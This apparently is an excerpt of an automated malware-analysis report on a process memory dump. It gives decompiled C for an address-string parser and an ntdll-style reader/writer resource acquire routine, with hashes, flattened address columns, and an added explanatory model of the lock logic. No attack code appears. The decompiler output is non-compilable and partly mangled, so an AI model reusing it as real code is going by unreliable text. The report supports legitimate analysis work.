                                      • Instruction ID: 3b822689b25480092df294637efd8dee6125b0289cc140f5ac885a91bfd36f44
                                      • Opcode Fuzzy Hash: 5a42875e6b306f1d3faedce7fca214e7b41ba9fee36307dca22d3883ccbee2dc
                                      • Instruction Fuzzy Hash: 1541BB7164031D7AEF24DAA4DCC5FEAB3BDBB58704F100499A505E6080F7709A458F69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E025D0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                      				signed int _v8;
                                      				signed int _v12;
                                      				signed int _v16;
                                      				signed int _v20;
                                      				signed int _v24;
                                      				signed int _v28;
                                      				signed int _v32;
                                      				void* _t108;
                                      				void* _t116;
                                      				char _t120;
                                      				short _t121;
                                      				void* _t128;
                                      				intOrPtr* _t130;
                                      				char _t132;
                                      				short _t133;
                                      				intOrPtr _t141;
                                      				signed int _t156;
                                      				signed int _t174;
                                      				intOrPtr _t177;
                                      				intOrPtr* _t179;
                                      				intOrPtr _t180;
                                      				void* _t183;
                                      
                                      				_t179 = _a4;
                                      				_t141 =  *_t179;
                                      				_v16 = 0;
                                      				_v28 = 0;
                                      				_v8 = 0;
                                      				_v24 = 0;
                                      				_v12 = 0;
                                      				_v32 = 0;
                                      				_v20 = 0;
                                      				if(_t141 == 0) {
                                      					L41:
                                      					 *_a8 = _t179;
                                      					_t180 = _v24;
                                      					if(_t180 != 0) {
                                      						if(_t180 != 3) {
                                      							goto L6;
                                      						}
                                      						_v8 = _v8 + 1;
                                      					}
                                      					_t174 = _v32;
                                      					if(_t174 == 0) {
                                      						if(_v8 == 7) {
                                      							goto L43;
                                      						}
                                      						goto L6;
                                      					}
                                      					L43:
                                      					if(_v16 != 1) {
                                      						if(_v16 != 2) {
                                      							goto L6;
                                      						}
                                      						 *((short*)(_a12 + _v20 * 2)) = 0;
                                      						L47:
                                      						if(_t174 != 0) {
                                      							E025A8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                      							_t116 = 8;
                                      							E0259DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                      						}
                                      						return 0;
                                      					}
                                      					if(_t180 != 0) {
                                      						if(_v12 > 3) {
                                      							goto L6;
                                      						}
                                      						_t120 = E025D0CFA(_v28, 0, 0xa);
                                      						_t183 = _t183 + 0xc;
                                      						if(_t120 > 0xff) {
                                      							goto L6;
                                      						}
                                      						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                      						goto L47;
                                      					}
                                      					if(_v12 > 4) {
                                      						goto L6;
                                      					}
                                      					_t121 = E025D0CFA(_v28, _t180, 0x10);
                                      					_t183 = _t183 + 0xc;
                                      					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                      					goto L47;
                                      				} else {
                                      					while(1) {
                                      						_t123 = _v16;
                                      						if(_t123 == 0) {
                                      							goto L7;
                                      						}
                                      						_t108 = _t123 - 1;
                                      						if(_t108 != 0) {
                                      							goto L1;
                                      						}
                                      						_t178 = _t141;
                                      						if(E025D06BA(_t108, _t141) == 0 || _t135 == 0) {
                                      							if(E025D06BA(_t135, _t178) == 0 || E025D0A5B(_t136, _t178) == 0) {
                                      								if(_t141 != 0x3a) {
                                      									if(_t141 == 0x2e) {
                                      										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                      											goto L41;
                                      										} else {
                                      											_v24 = _v24 + 1;
                                      											L27:
                                      											_v16 = _v16 & 0x00000000;
                                      											L28:
                                      											if(_v28 == 0) {
                                      												goto L20;
                                      											}
                                      											_t177 = _v24;
                                      											if(_t177 != 0) {
                                      												if(_v12 > 3) {
                                      													L6:
                                      													return 0xc000000d;
                                      												}
                                      												_t132 = E025D0CFA(_v28, 0, 0xa);
                                      												_t183 = _t183 + 0xc;
                                      												if(_t132 > 0xff) {
                                      													goto L6;
                                      												}
                                      												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                      												goto L20;
                                      											}
                                      											if(_v12 > 4) {
                                      												goto L6;
                                      											}
                                      											_t133 = E025D0CFA(_v28, 0, 0x10);
                                      											_t183 = _t183 + 0xc;
                                      											_v20 = _v20 + 1;
                                      											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                      											goto L20;
                                      										}
                                      									}
                                      									goto L41;
                                      								}
                                      								if(_v24 > 0 || _v8 > 6) {
                                      									goto L41;
                                      								} else {
                                      									_t130 = _t179 + 1;
                                      									if( *_t130 == _t141) {
                                      										if(_v32 != 0) {
                                      											goto L41;
                                      										}
                                      										_v32 = _v8 + 1;
                                      										_t156 = 2;
                                      										_v8 = _v8 + _t156;
                                      										L34:
                                      										_t179 = _t130;
                                      										_v16 = _t156;
                                      										goto L28;
                                      									}
                                      									_v8 = _v8 + 1;
                                      									goto L27;
                                      								}
                                      							} else {
                                      								_v12 = _v12 + 1;
                                      								if(_v24 > 0) {
                                      									goto L41;
                                      								}
                                      								_a7 = 1;
                                      								goto L20;
                                      							}
                                      						} else {
                                      							_v12 = _v12 + 1;
                                      							L20:
                                      							_t179 = _t179 + 1;
                                      							_t141 =  *_t179;
                                      							if(_t141 == 0) {
                                      								goto L41;
                                      							}
                                      							continue;
                                      						}
                                      						L7:
                                      						if(_t141 == 0x3a) {
                                      							if(_v24 > 0 || _v8 > 0) {
                                      								goto L41;
                                      							} else {
                                      								_t130 = _t179 + 1;
                                      								if( *_t130 != _t141) {
                                      									goto L41;
                                      								}
                                      								_v20 = _v20 + 1;
                                      								_t156 = 2;
                                      								_v32 = 1;
                                      								_v8 = _t156;
                                      								 *((short*)(_a12 + _v20 * 2)) = 0;
                                      								goto L34;
                                      							}
                                      						}
                                      						L8:
                                      						if(_v8 > 7) {
                                      							goto L41;
                                      						}
                                      						_t142 = _t141;
                                      						if(E025D06BA(_t123, _t141) == 0 || _t124 == 0) {
                                      							if(E025D06BA(_t124, _t142) == 0 || E025D0A5B(_t125, _t142) == 0 || _v24 > 0) {
                                      								goto L41;
                                      							} else {
                                      								_t128 = 1;
                                      								_a7 = 1;
                                      								_v28 = _t179;
                                      								_v16 = 1;
                                      								_v12 = 1;
                                      								L39:
                                      								if(_v16 == _t128) {
                                      									goto L20;
                                      								}
                                      								goto L28;
                                      							}
                                      						} else {
                                      							_a7 = 0;
                                      							_v28 = _t179;
                                      							_v16 = 1;
                                      							_v12 = 1;
                                      							goto L20;
                                      						}
                                      					}
                                      				}
                                      				L1:
                                      				_t123 = _t108 == 1;
                                      				if(_t108 == 1) {
                                      					goto L8;
                                      				}
                                      				_t128 = 1;
                                      				goto L39;
                                      			}

                                      Instruction addresses (per-line address column of the decompiled listing above, flattened by extraction): 0x025d0b21 0x025d0b24 0x025d0b27 0x025d0b2a 0x025d0b2d 0x025d0b30 0x025d0b33 0x025d0b36 0x025d0b39 0x025d0b3e 0x025d0c65 0x025d0c68 0x025d0c6a 0x025d0c6f 0x025feb42 0x00000000 0x00000000 0x025feb48 0x025feb48 0x025d0c75 0x025d0c7a 0x025feb54 0x00000000 0x00000000 0x00000000 0x025feb5a 0x025d0c80 0x025d0c84 0x025feb98 0x00000000 0x00000000 0x025feba6 0x025d0cb8 0x025d0cba 0x025d0cd3 0x025d0cda 0x025d0ce4 0x025d0ce9 0x00000000 0x025d0cec 0x025d0c8c 0x025feb63 0x00000000 0x00000000 0x025feb70 0x025feb75 0x025feb7d 0x00000000 0x00000000 0x025feb8c 0x00000000 0x025feb8c 0x025d0c96 0x00000000 0x00000000 0x025d0ca2 0x025d0cac 0x025d0cb4 0x00000000 0x00000000 0x025d0b44 0x025d0b47 0x025d0b49 0x00000000 0x00000000 0x025d0b4f 0x025d0b50 0x00000000 0x00000000 0x025d0b56 0x025d0b62 0x025d0b7c 0x025d0bac 0x025d0a0f 0x025feaaa 0x00000000 0x025feac4 0x025feac4 0x025d0bd0 0x025d0bd0 0x025d0bd4 0x025d0bd9 0x00000000 0x00000000 0x025d0bdb 0x025d0be0 0x025feb0e 0x025d0a1a 0x00000000 0x025d0a1a 0x025feb1a 0x025feb1f 0x025feb27 0x00000000 0x00000000 0x025feb36 0x00000000 0x025feb36 0x025d0bea 0x00000000 0x00000000 0x025d0bf6 0x025d0c00 0x025d0c03 0x025d0c0b 0x00000000 0x025d0c0b 0x025feaaa 0x00000000 0x025d0a15 0x025d0bb6 0x00000000 0x025d0bc6 0x025d0bc6 0x025d0bcb 0x025d0c15 0x00000000 0x00000000 0x025d0c1d 0x025d0c20 0x025d0c21 0x025d0c24 0x025d0c24 0x025d0c26 0x00000000 0x025d0c26 0x025d0bcd 0x00000000 0x025d0bcd 0x025d0b89 0x025d0b89 0x025d0b90 0x00000000 0x00000000 0x025d0b96 0x00000000 0x025d0b96 0x025d0a04 0x025d0a04 0x025d0b9a 0x025d0b9a 0x025d0b9b 0x025d0b9f 0x00000000 0x00000000 0x00000000 0x025d0ba5 0x025d0ac7 0x025d0aca 0x025feacf 0x00000000 0x025feade 0x025feade 0x025feae3 0x00000000 0x00000000 0x025feaf3 0x025feaf6 0x025feaf7 0x025feafe 0x025feb01 0x00000000 0x025feb01 0x025feacf 0x025d0ad0 0x025d0ad4 0x00000000 0x00000000 0x025d0ada 0x025d0ae6 0x025d0c34 0x00000000 0x025d0c47 0x025d0c49 0x025d0c4a 0x025d0c4e 0x025d0c51 0x025d0c54 0x025d0c57 0x025d0c5a 0x00000000 0x00000000 0x00000000 0x025d0c60 0x025d0afb 0x025d0afe 0x025d0b02 0x025d0b05 0x025d0b08
                                      0x00000000
                                      0x025d0b08
                                      0x025d0ae6
                                      0x025d0b44
                                      0x025d09f8
                                      0x025d09f8
                                      0x025d09f9
                                      0x00000000
                                      0x00000000
                                      0x025feaa0
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
• Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp
• Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp
• Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp
• Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp
• Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp
• Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp
• Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: __fassign
                                      • String ID: .$:$:
                                      • API String ID: 3965848254-2308638275
                                      • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                      • Instruction ID: 094c17f6aaa029459ab872151b7308a5b3f065f220acf84a0ea1f6b422279323
                                      • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                      • Instruction Fuzzy Hash: 22A18B7190420AEEDF34DF6CC8446BEBBB9BF45309F24886AD842A72E0D7349645CB59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

C-Code - Quality: 49%
			/* Decompiler output as emitted by the report; not compilable as-is.  The debug-print
			   format strings ("RTL: Acquire Shared Sem Timeout", "RTL: Acquire Exclusive Sem Timeout",
			   "RTL: Resource at %p") and the field offsets (+0x28 NumberOfActive, +0x2c
			   ExclusiveOwnerThread compared with TEB->ClientId.UniqueThread at fs:[0x18]+0x24,
			   +0x34 DebugInfo with ContentionCount at +0x14) match ntdll's RTL_RESOURCE acquire
			   routines; 0x102 is STATUS_TIMEOUT.  The exclusive-acquire body has been folded into
			   this function after a noreturn call (the asm("int3") that follows it). */
			E025D0554(signed int _a4, char _a8) {
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				signed int* _t49;
                                      				signed int _t51;
                                      				signed int _t56;
                                      				signed int _t58;
                                      				signed int _t61;
                                      				signed int _t63;
                                      				void* _t66;
                                      				intOrPtr _t67;
                                      				signed int _t70;
                                      				void* _t75;
                                      				signed int _t81;
                                      				signed int _t84;
                                      				void* _t86;
                                      				signed int _t93;
                                      				signed int _t96;
                                      				intOrPtr _t105;
                                      				signed int _t107;
                                      				void* _t110;
                                      				signed int _t115;
                                      				signed int* _t119;
                                      				void* _t125;
                                      				void* _t126;
                                      				signed int _t128;
                                      				signed int _t130;
                                      				signed int _t138;
                                      				signed int _t144;
                                      				void* _t158;
                                      				void* _t159;
                                      				void* _t160;
                                      
                                      				_t96 = _a4;
                                      				_t115 =  *(_t96 + 0x28);
                                      				_push(_t138);
                                      				if(_t115 < 0) {
                                      					_t105 =  *[fs:0x18];
                                      					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                      					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                      						goto L6;
                                      					} else {
                                      						__eflags = _t115 | 0xffffffff;
                                      						asm("lock xadd [eax], edx");
                                      						return 1;
                                      					}
                                      				} else {
                                      					L6:
                                      					_push(_t128);
                                      					while(1) {
                                      						L7:
                                      						__eflags = _t115;
                                      						if(_t115 >= 0) {
                                      							break;
                                      						}
                                      						__eflags = _a8;
                                      						if(_a8 == 0) {
                                      							__eflags = 0;
                                      							return 0;
                                      						} else {
                                      							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                      							_t49 = _t96 + 0x1c;
                                      							_t106 = 1;
                                      							asm("lock xadd [edx], ecx");
                                      							_t115 =  *(_t96 + 0x28);
                                      							__eflags = _t115;
                                      							if(_t115 < 0) {
                                      								L23:
                                      								_t130 = 0;
                                      								__eflags = 0;
                                      								while(1) {
                                      									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                      									asm("sbb esi, esi");
                                      									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x026701c0;
                                      									_push(_t144);
                                      									_push(0);
                                      									_t51 = E0258F8CC( *((intOrPtr*)(_t96 + 0x18)));
                                      									__eflags = _t51 - 0x102;
                                      									if(_t51 != 0x102) {
                                      										break;
                                      									}
                                      									_t106 =  *(_t144 + 4);
                                      									_t126 =  *_t144;
                                      									_t86 = E025D4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                      									_push(_t126);
                                      									_push(_t86);
                                      									E025E3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                      									E025E3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                      									_t130 = _t130 + 1;
                                      									_t160 = _t158 + 0x28;
                                      									__eflags = _t130 - 2;
                                      									if(__eflags > 0) {
                                      										E0261217A(_t106, __eflags, _t96);
                                      									}
                                      									_push("RTL: Re-Waiting\n");
                                      									_push(0);
                                      									_push(0x65);
                                      									E025E3F92();
                                      									_t158 = _t160 + 0xc;
                                      								}
                                      								__eflags = _t51;
                                      								if(__eflags < 0) {
                                      									_push(_t51);
                                      									E025D3915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                      									asm("int3");
                                      									while(1) {
                                      										L32:
                                      										__eflags = _a8;
                                      										if(_a8 == 0) {
                                      											break;
                                      										}
                                      										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                      										_t119 = _t96 + 0x24;
                                      										_t107 = 1;
                                      										asm("lock xadd [eax], ecx");
                                      										_t56 =  *(_t96 + 0x28);
                                      										_a4 = _t56;
                                      										__eflags = _t56;
                                      										if(_t56 != 0) {
                                      											L40:
                                      											_t128 = 0;
                                      											__eflags = 0;
                                      											while(1) {
                                      												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                      												asm("sbb esi, esi");
                                      												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x026701c0;
                                      												_push(_t138);
                                      												_push(0);
                                      												_t58 = E0258F8CC( *((intOrPtr*)(_t96 + 0x20)));
                                      												__eflags = _t58 - 0x102;
                                      												if(_t58 != 0x102) {
                                      													break;
                                      												}
                                      												_t107 =  *(_t138 + 4);
                                      												_t125 =  *_t138;
                                      												_t75 = E025D4FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                      												_push(_t125);
                                      												_push(_t75);
                                      												E025E3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                      												E025E3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                      												_t128 = _t128 + 1;
                                      												_t159 = _t158 + 0x28;
                                      												__eflags = _t128 - 2;
                                      												if(__eflags > 0) {
                                      													E0261217A(_t107, __eflags, _t96);
                                      												}
                                      												_push("RTL: Re-Waiting\n");
                                      												_push(0);
                                      												_push(0x65);
                                      												E025E3F92();
                                      												_t158 = _t159 + 0xc;
                                      											}
                                      											__eflags = _t58;
                                      											if(__eflags < 0) {
                                      												_push(_t58);
                                      												E025D3915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                      												asm("int3");
                                      												_t61 =  *_t107;
                                      												 *_t107 = 0;
                                      												__eflags = _t61;
                                      												if(_t61 == 0) {
                                      													L1:
                                      													_t63 = E025B5384(_t138 + 0x24);
                                      													if(_t63 != 0) {
                                      														goto L52;
                                      													} else {
                                      														goto L2;
                                      													}
                                      												} else {
                                      													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                      													_push( &_a4);
                                      													_push(_t61);
                                      													_t70 = E0258F970( *((intOrPtr*)(_t138 + 0x18)));
                                      													__eflags = _t70;
                                      													if(__eflags >= 0) {
                                      														goto L1;
                                      													} else {
                                      														_push(_t70);
                                      														E025D3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                      														L52:
                                      														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                      														_push( &_a4);
                                      														_push(1);
                                      														_t63 = E0258F970( *((intOrPtr*)(_t138 + 0x20)));
                                      														__eflags = _t63;
                                      														if(__eflags >= 0) {
                                      															L2:
                                      															return _t63;
                                      														} else {
                                      															_push(_t63);
                                      															E025D3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                      															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                      															_push( &_a4);
                                      															_push(1);
                                      															_t63 = E0258F970( *((intOrPtr*)(_t138 + 0x20)));
                                      															__eflags = _t63;
                                      															if(__eflags >= 0) {
                                      																goto L2;
                                      															} else {
                                      																_push(_t63);
                                      																_t66 = E025D3915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                      																asm("int3");
                                      																while(1) {
                                      																	_t110 = _t66;
                                      																	__eflags = _t66 - 1;
                                      																	if(_t66 != 1) {
                                      																		break;
                                      																	}
                                      																	_t128 = _t128 | 0xffffffff;
                                      																	_t66 = _t110;
                                      																	asm("lock cmpxchg [ebx], edi");
                                      																	__eflags = _t66 - _t110;
                                      																	if(_t66 != _t110) {
                                      																		continue;
                                      																	} else {
                                      																		_t67 =  *[fs:0x18];
                                      																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                      																		return _t67;
                                      																	}
                                      																	goto L58;
                                      																}
                                      																E025B5329(_t110, _t138);
                                      																return E025B53A5(_t138, 1);
                                      															}
                                      														}
                                      													}
                                      												}
                                      											} else {
                                      												_t56 =  *(_t96 + 0x28);
                                      												goto L3;
                                      											}
                                      										} else {
                                      											_t107 =  *_t119;
                                      											__eflags = _t107;
                                      											if(__eflags > 0) {
                                      												while(1) {
                                      													_t81 = _t107;
                                      													asm("lock cmpxchg [edi], esi");
                                      													__eflags = _t81 - _t107;
                                      													if(_t81 == _t107) {
                                      														break;
                                      													}
                                      													_t107 = _t81;
                                      													__eflags = _t81;
                                      													if(_t81 > 0) {
                                      														continue;
                                      													}
                                      													break;
                                      												}
                                      												_t56 = _a4;
                                      												__eflags = _t107;
                                      											}
                                      											if(__eflags != 0) {
                                      												while(1) {
                                      													L3:
                                      													__eflags = _t56;
                                      													if(_t56 != 0) {
                                      														goto L32;
                                      													}
                                      													_t107 = _t107 | 0xffffffff;
                                      													_t56 = 0;
                                      													asm("lock cmpxchg [edx], ecx");
                                      													__eflags = 0;
                                      													if(0 != 0) {
                                      														continue;
                                      													} else {
                                      														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                      														return 1;
                                      													}
                                      													goto L58;
                                      												}
                                      												continue;
                                      											} else {
                                      												goto L40;
                                      											}
                                      										}
                                      										goto L58;
                                      									}
                                      									__eflags = 0;
                                      									return 0;
                                      								} else {
                                      									_t115 =  *(_t96 + 0x28);
                                      									continue;
                                      								}
                                      							} else {
                                      								_t106 =  *_t49;
                                      								__eflags = _t106;
                                      								if(__eflags > 0) {
                                      									while(1) {
                                      										_t93 = _t106;
                                      										asm("lock cmpxchg [edi], esi");
                                      										__eflags = _t93 - _t106;
                                      										if(_t93 == _t106) {
                                      											break;
                                      										}
                                      										_t106 = _t93;
                                      										__eflags = _t93;
                                      										if(_t93 > 0) {
                                      											continue;
                                      										}
                                      										break;
                                      									}
                                      									__eflags = _t106;
                                      								}
                                      								if(__eflags != 0) {
                                      									continue;
                                      								} else {
                                      									goto L23;
                                      								}
                                      							}
                                      						}
                                      						goto L58;
                                      					}
                                      					_t84 = _t115;
                                      					asm("lock cmpxchg [esi], ecx");
                                      					__eflags = _t84 - _t115;
                                      					if(_t84 != _t115) {
                                      						_t115 = _t84;
                                      						goto L7;
                                      					} else {
                                      						return 1;
                                      					}
                                      				}
                                      				L58:
                                      			}
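To make the listing above readable, here is a single-threaded model of the acquire logic it contains: the lock-free cmpxchg increment of NumberOfActive for shared access, the 0 -> -1 transition plus owner record for exclusive access, recursion by the exclusive owner, waiter registration with the contention counter, and the cmpxchg loop that withdraws a registration when the resource became free in the meantime. This is an added example written for this page, not ntdll's code and not code from the report. It assumes the public RTL_RESOURCE field names at the offsets the listing uses; the locked instructions are replaced by plain helpers (so the model is not thread-safe), and the semaphore wait that the real routine enters when it must block is only reported, not performed.

```c
/* Added example (editor's reconstruction, not ntdll and not from the report):
 * single-threaded model of the RTL_RESOURCE acquire paths seen in the listing.
 * Assumed: public RTL_RESOURCE field names at the listing's offsets; "lock
 * cmpxchg"/"lock xadd" modelled by plain helpers (not thread-safe); the real
 * semaphore wait is reported as ACQ_MUST_WAIT instead of being performed. */
#include <stdint.h>
#include <stdbool.h>

typedef struct {
    uint32_t  number_of_waiting_shared;    /* +0x1c */
    uint32_t  number_of_waiting_exclusive; /* +0x24 */
    int32_t   number_of_active;            /* +0x28: >0 shared holders, <0 exclusive (nesting depth) */
    uintptr_t exclusive_owner;             /* +0x2c: compared with TEB->ClientId.UniqueThread */
    uint32_t  contention_count;            /* DebugInfo (+0x34) -> ContentionCount (+0x14) */
} model_resource;

typedef enum { ACQ_ACQUIRED, ACQ_WOULD_BLOCK, ACQ_MUST_WAIT } acq_result;

/* Stand-in for "lock cmpxchg [mem], desired" with eax = expected; returns the old value. */
static int32_t cas32(int32_t *p, int32_t expected, int32_t desired)
{
    int32_t old = *p;
    if (old == expected) *p = desired;
    return old;
}

/* Withdraw a waiter registration after the resource became free while we were
 * registering (the cmpxchg loop on the waiting count in the listing).  Returns
 * false when the count was already 0: a releaser consumed our registration and
 * signalled the semaphore, so the real routine still has to wait to absorb it. */
static bool unregister_waiter(uint32_t *count)
{
    int32_t w = (int32_t)*count;
    while (w > 0) {
        int32_t old = cas32((int32_t *)count, w, w - 1);
        if (old == w) return true;
        w = old;
    }
    return false;
}

acq_result model_acquire_shared(model_resource *r, uintptr_t tid, bool wait)
{
    int32_t active = r->number_of_active;
    if (active < 0 && r->exclusive_owner == tid) {
        r->number_of_active -= 1;    /* lock xadd [NumberOfActive], -1: owner re-enters */
        return ACQ_ACQUIRED;
    }
    for (;;) {
        if (active >= 0) {           /* free or shared: lock-free increment */
            int32_t old = cas32(&r->number_of_active, active, active + 1);
            if (old == active) return ACQ_ACQUIRED;
            active = old;            /* lost the race, re-examine the new value */
            continue;
        }
        if (!wait) return ACQ_WOULD_BLOCK;
        r->contention_count++;
        r->number_of_waiting_shared++;   /* lock xadd [NumberOfWaitingShared], 1 */
        active = r->number_of_active;    /* re-read after registering */
        if (active < 0)                  /* real code: wait on SharedSemaphore, re-wait on 0x102 */
            return ACQ_MUST_WAIT;
        if (!unregister_waiter(&r->number_of_waiting_shared)) return ACQ_MUST_WAIT;
    }
}

acq_result model_acquire_exclusive(model_resource *r, uintptr_t tid, bool wait)
{
    int32_t active = r->number_of_active;
    if (active < 0 && r->exclusive_owner == tid) {
        r->number_of_active -= 1;    /* nested exclusive acquisition by the owner */
        return ACQ_ACQUIRED;
    }
    for (;;) {
        if (active == 0) {           /* free: lock-free 0 -> -1, then record the owner */
            if (cas32(&r->number_of_active, 0, -1) == 0) {
                r->exclusive_owner = tid;   /* *(res+0x2c) = TEB->ClientId.UniqueThread */
                return ACQ_ACQUIRED;
            }
            active = r->number_of_active;
            continue;
        }
        if (!wait) return ACQ_WOULD_BLOCK;
        r->contention_count++;
        r->number_of_waiting_exclusive++;
        active = r->number_of_active;
        if (active != 0)                 /* real code: wait on ExclusiveSemaphore */
            return ACQ_MUST_WAIT;
        if (!unregister_waiter(&r->number_of_waiting_exclusive)) return ACQ_MUST_WAIT;
    }
}
```

The model is useful for triage: the logic it captures is generic reader/writer-lock bookkeeping, which is what one expects in this region given the RTL debug strings, rather than sample-specific behaviour.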

Instruction address column for E025D0554 (one address per C-code line; the pairing was lost in extraction and the column is truncated): 0x025d055a-0x025d05f3 for the function body, 0x025f217f-0x025f23a3 and 0x025b5367-0x025b537c for code located elsewhere in the mapping, with 0x00000000 marking lines that have no address.
                                      0x025f23a6
                                      0x025f23ab
                                      0x025f23ad
                                      0x00000000
                                      0x025f23b3
                                      0x025f23b3
                                      0x025f23b4
                                      0x025f23b9
                                      0x025f23ba
                                      0x025f23ba
                                      0x025f23bc
                                      0x025f23bf
                                      0x00000000
                                      0x00000000
                                      0x025e9153
                                      0x025e9158
                                      0x025e915a
                                      0x025e915e
                                      0x025e9160
                                      0x00000000
                                      0x025e9166
                                      0x025e9166
                                      0x025e9171
                                      0x025e9176
                                      0x025e9176
                                      0x00000000
                                      0x025e9160
                                      0x025f23c6
                                      0x025f23d7
                                      0x025f23d7
                                      0x025f23ad
                                      0x025f2390
                                      0x025f2373
                                      0x025f233f
                                      0x025f233f
                                      0x00000000
                                      0x025f233f
                                      0x025f2291
                                      0x025f2291
                                      0x025f2293
                                      0x025f2295
                                      0x025f229a
                                      0x025f22a1
                                      0x025f22a3
                                      0x025f22a7
                                      0x025f22a9
                                      0x00000000
                                      0x00000000
                                      0x025f22ab
                                      0x025f22ad
                                      0x025f22af
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x025f22af
                                      0x025f22b1
                                      0x025f22b4
                                      0x025f22b4
                                      0x025f22b6
                                      0x025b53be
                                      0x025b53be
                                      0x025b53be
                                      0x025b53c0
                                      0x00000000
                                      0x00000000
                                      0x025b53cb
                                      0x025b53ce
                                      0x025b53d0
                                      0x025b53d4
                                      0x025b53d6
                                      0x00000000
                                      0x025b53d8
                                      0x025b53e3
                                      0x025b53ea
                                      0x025b53ea
                                      0x00000000
                                      0x025b53d6
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x025f22b6
                                      0x00000000
                                      0x025f228f
                                      0x025f2349
                                      0x025f234d
                                      0x025f2251
                                      0x025f2251
                                      0x00000000
                                      0x025f2251
                                      0x025f21a4
                                      0x025f21a4
                                      0x025f21a6
                                      0x025f21a8
                                      0x025f21ac
                                      0x025f21b6
                                      0x025f21b8
                                      0x025f21bc
                                      0x025f21be
                                      0x00000000
                                      0x00000000
                                      0x025f21c0
                                      0x025f21c2
                                      0x025f21c4
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x025f21c4
                                      0x025f21c6
                                      0x025f21c6
                                      0x025f21c8
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x025f21c8
                                      0x025f21a2
                                      0x00000000
                                      0x025f2183
                                      0x025d057b
                                      0x025d057d
                                      0x025d0581
                                      0x025d0583
                                      0x025f2178
                                      0x00000000
                                      0x025d0589
                                      0x025d058f
                                      0x025d058f
                                      0x025d0583
                                      0x00000000

                                      APIs
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 025F2206
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                      • API String ID: 885266447-4236105082
                                      • Opcode ID: 34d857a008bc043c351624942ec6ccef10ec937c3e465678f12fc91d82bb82b6
